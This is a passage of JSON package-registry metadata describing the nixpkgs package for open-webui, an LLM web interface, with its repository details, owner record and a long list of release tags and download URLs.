H","email":"sbh69840@gmail.com","url":"https://github.com/shivaraj-bh","packages_count":17,"html_url":null,"role":null,"created_at":"2026-03-08T00:17:34.736Z","updated_at":"2026-03-08T00:17:34.736Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers/shivaraj-bh/packages"}],"registry":{"name":"nixpkgs-24.11","url":"https://channels.nixos.org/nixos-24.11","ecosystem":"nixpkgs","default":false,"packages_count":121983,"maintainers_count":3777,"namespaces_count":0,"keywords_count":739,"github":"NixOS","metadata":{"funded_packages_count":3757},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.059Z","updated_at":"2026-09-02T05:05:10.221Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/namespaces"}},{"id":13186285,"name":"open-webui","ecosystem":"nixpkgs","description":"Comprehensive suite for LLMs with a user-friendly WebUI","homepage":"https://github.com/open-webui/open-webui","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/open-webui/open-webui","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T23:56:01.392Z","latest_release_published_at":"2026-02-01T23:56:01.392Z","latest_release_number":"0.3.12","last_synced_at":"2026-03-06T23:12:18.356Z","created_at":"2026-02-01T23:55:38.656Z","updated_at":"2026-08-23T09:52:46.105Z","registry_url":"https://search.nixos.org/packages?channel=24.05\u0026query=open-webui","install_command":"nix-env -iA nixpkgs.open-webui","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.05/pkgs/by-name/op/open-webui/package.nix#L142","metadata":{"nix_attribute":"open-webui-0.3.12","position":"pkgs/by-name/op/open-webui/package.nix:142","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","x86_64-windows","i686-windows"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"]},"repo_metadata":{"id":199152863,"uuid":"701547123","full_name":"open-webui/open-webui","owner":"open-webui","description":"User-friendly AI Interface (Supports Ollama, OpenAI API, ...)","archived":false,"fork":false,"pushed_at":"2026-08-22T13:13:14.000Z","size":409036,"stargazers_count":149582,"open_issues_count":326,"forks_count":21818,"subscribers_count":651,"default_branch":"main","last_synced_at":"2026-08-22T19:45:51.996Z","etag":null,"topics":["ai","llm","llm-ui","llm-webui","llms","mcp","ollama","ollama-webui","open-webui","openai","openapi","rag","self-hosted","ui","webui"],"latest_commit_sha":null,"homepage":"https://openwebui.com","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/open-webui.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"docs/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":null,"gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":"CONTRIBUTOR_LICENSE_AGREEMENT","disclosure":null},"funding":{"github":"open-webui"}},"created_at":"2023-10-06T22:08:27.000Z","updated_at":"2026-08-22T19:12:28.000Z","dependencies_parsed_at":"2026-08-15T05:21:06.356Z","dependency_job_id":null,"html_url":"https://github.com/open-webui/open-webui","commit_stats":{"total_commits":4572,"total_committers":249,"mean_commits":18.36144578313253,"dds":0.3506124234470691,"last_synced_commit":"1d225dd804575af9ae5981528dfdce695f7f7040"},"previous_names":["ollama-webui/ollama-webui","open-webui/open-webui"],"tags_count":167,"template":false,"template_full_name":null,"purl":"pkg:github/open-webui/open-webui","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/open-webui","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36835287,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"open-webui","name":"Open WebUI","uuid":"158137808","kind":"organization","description":"On a mission to build the best AI user interface.","email":"support@openwebui.com","website":"https://openwebui.com","location":null,"twitter":"OpenWebUI","company":null,"icon_url":"https://avatars.githubusercontent.com/u/158137808?v=4","repositories_count":25,"last_synced_at":"2026-08-22T19:45:41.038Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/open-webui","funding_links":["https://github.com/sponsors/open-webui"],"total_stars":164651,"followers":5228,"following":0,"created_at":"2024-02-17T08:24:26.070Z","updated_at":"2026-08-22T19:45:41.055Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/open-webui","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/open-webui/repositories"},"tags":[{"name":"v0.11.0","sha":"f9590b8017199e56d5e953657e6498e3cef1d246","kind":"commit","published_at":"2026-07-27T09:30:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.11.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.11.0/manifests"},{"name":"v0.10.2","sha":"ecd48e2f718220a6400ecf49eafd4867a38feb10","kind":"commit","published_at":"2026-07-01T08:40:54.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.10.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"b711935dd57dbc223ebbf410175a8bbe7e4efafb","kind":"commit","published_at":"2026-06-29T19:38:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.10.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"4d2e13cf2bcc451b33bb6374bea4d2163e6cc94c","kind":"commit","published_at":"2026-06-29T19:17:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.10.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.0/manifests"},{"name":"v0.9.6","sha":"1a97751e376e00a1897bc3679215ae1c7bd8fd42","kind":"commit","published_at":"2026-06-02T02:09:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"3660bc00fd807deced3400a63bfa6db47811a3bb","kind":"commit","published_at":"2026-05-10T18:13:55.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"f51d2b026f1b0e7283b15f093412be8b67d24770","kind":"commit","published_at":"2026-05-09T07:50:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"adc9076d176679fd913c5dc44d0bd4d8f86d1fc3","kind":"commit","published_at":"2026-05-09T07:17:07.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"8dae237a0bfdac4b7f55b463b3e2769ea4b94a0b","kind":"commit","published_at":"2026-04-24T09:56:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"0a8a620fb6fd4c914494f56ac06475bd5f95a985","kind":"commit","published_at":"2026-04-21T10:45:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"f31768e20e5c6b4f6da0ef657877298b359936cf","kind":"commit","published_at":"2026-04-21T07:56:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.0/manifests"},{"name":"v0.8.12","sha":"9bd84258d09eefe7bf975878fb0e31a5dadfe0f8","kind":"commit","published_at":"2026-03-27T00:26:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.12/manifests"},{"name":"v0.8.11","sha":"4d058a125b17eb57212af5eab98d683548d546e3","kind":"commit","published_at":"2026-03-25T22:49:59.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.11/manifests"},{"name":"v0.8.10","sha":"e4e69a10ec08a725bf2ab3db499ef664f2bd7570","kind":"commit","published_at":"2026-03-09T00:09:43.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.10/manifests"},{"name":"v0.8.9","sha":"6c159a97b7efdfdbfa262ebd26823a2d695b561d","kind":"commit","published_at":"2026-03-08T02:56:22.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.9/manifests"},{"name":"v0.8.8","sha":"79f04379801622181ef9c591374a285eac4e1c4d","kind":"commit","published_at":"2026-03-02T23:32:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.8/manifests"},{"name":"v0.8.7","sha":"6137f7cb7ecda49d5fa6857c5e9fa8942dda6b23","kind":"commit","published_at":"2026-03-02T01:14:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.7/manifests"},{"name":"v0.8.6","sha":"9c9a18d6d4311ff246d5d1345d94581bf25c604b","kind":"commit","published_at":"2026-03-01T21:03:55.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"1ac3dd4a893e13803e7b889611303c4a7a5cc470","kind":"commit","published_at":"2026-02-23T09:26:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"2ed3055c42ae18e3372081c18629963b0e244a62","kind":"commit","published_at":"2026-02-23T07:58:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"b8112d72b95e480f946f0688bed29321b61e65af","kind":"commit","published_at":"2026-02-17T07:25:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"7c7fe443289c3d0307ebbcf320fb1d895c3ee79b","kind":"commit","published_at":"2026-02-16T07:37:13.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"883f1dda0f18fbe26aca7aed5a8804021a3685ca","kind":"commit","published_at":"2026-02-14T00:04:11.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"7a7a25766c3dc13fa85544a93d011e00b7c0b2b4","kind":"commit","published_at":"2026-02-12T23:42:25.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.0/manifests"},{"name":"v0.7.2","sha":"2b26355002064228e9b671339f8f3fb9d1fafa73","kind":"commit","published_at":"2026-01-10T21:00:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.7.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"f2a360cb87cc395a0195e1b57ff7272400db3bee","kind":"commit","published_at":"2026-01-09T20:57:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.7.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"6adde203cd292a9e3af9c64a2ae36b603fed096a","kind":"commit","published_at":"2026-01-09T18:51:34.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.7.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.0/manifests"},{"name":"v0.6.43","sha":"a7271532f8a38da46785afcaa7e65f9a45e7d753","kind":"commit","published_at":"2025-12-22T06:03:34.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.43","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.43","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.43","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.43","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.43/manifests"},{"name":"v0.6.42","sha":"d95f533214e3fe5beb5e41ec1f349940bc4c7043","kind":"commit","published_at":"2025-12-21T21:08:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.42","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.42","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.42","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.42","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.42/manifests"},{"name":"v0.6.41","sha":"6f1486ffd0cb288d0e21f41845361924e0d742b3","kind":"commit","published_at":"2025-12-02T22:28:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.41","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.41","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.41","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.41","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.41/manifests"},{"name":"v0.6.40","sha":"140605e660b8186a7d5c79fb3be6ffb147a2f498","kind":"commit","published_at":"2025-11-25T11:01:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.40","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.40","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.40","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.40","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.40/manifests"},{"name":"v0.6.39","sha":"9899293f050ad50ae12024cbebee7e018acd851e","kind":"commit","published_at":"2025-11-25T10:31:34.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.39","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.39","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.39","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.39","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.39/manifests"},{"name":"v0.6.38","sha":"e3faec62c58e3a83d89aa3df539feacefa125e0c","kind":"commit","published_at":"2025-11-24T12:00:31.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.38","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.38","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.38","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.38","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.38/manifests"},{"name":"v0.6.37","sha":"fe6783c16699911c7be17392596d579333fb110c","kind":"commit","published_at":"2025-11-24T03:10:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.37","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.37","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.37","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.37","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.37/manifests"},{"name":"v0.6.36","sha":"e0d5de16978786b8a7538adf1efcde5258f38faf","kind":"commit","published_at":"2025-11-06T21:45:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.36","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.36","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.36","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.36","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.36/manifests"},{"name":"v0.6.35","sha":"e85c7f79310f351672fe967a102396b6f3f5e88b","kind":"commit","published_at":"2025-11-06T18:40:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.35","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.35","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.35","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2